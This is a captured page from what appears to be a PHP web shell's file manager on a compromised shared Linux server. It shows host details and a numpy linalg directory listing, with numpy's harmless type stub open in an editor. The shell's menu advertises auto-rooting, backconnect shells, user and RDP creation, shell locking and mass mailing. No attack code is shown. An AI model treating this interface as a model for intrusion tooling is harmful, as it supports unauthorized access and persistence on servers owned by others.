Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
numpy /
linalg /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
__init__.py
1.77
KB
-rw-r--r--
__init__.pyi
696
B
-rw-r--r--
_umath_linalg.cpython-310-x86_...
145.47
KB
-rw-r--r--
lapack_lite.cpython-310-x86_64...
18.69
KB
-rw-r--r--
linalg.py
87.51
KB
-rw-r--r--
setup.py
2.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.pyi
from typing import Any, List __all__: List[str] class LinAlgError(Exception): ... def tensorsolve(a, b, axes=...): ... def solve(a, b): ... def tensorinv(a, ind=...): ... def inv(a): ... def matrix_power(a, n): ... def cholesky(a): ... def qr(a, mode=...): ... def eigvals(a): ... def eigvalsh(a, UPLO=...): ... def eig(a): ... def eigh(a, UPLO=...): ... def svd(a, full_matrices=..., compute_uv=..., hermitian=...): ... def cond(x, p=...): ... def matrix_rank(M, tol=..., hermitian=...): ... def pinv(a, rcond=..., hermitian=...): ... def slogdet(a): ... def det(a): ... def lstsq(a, b, rcond=...): ... def norm(x, ord=..., axis=..., keepdims=...): ... def multi_dot(arrays, *, out=...): ...
Close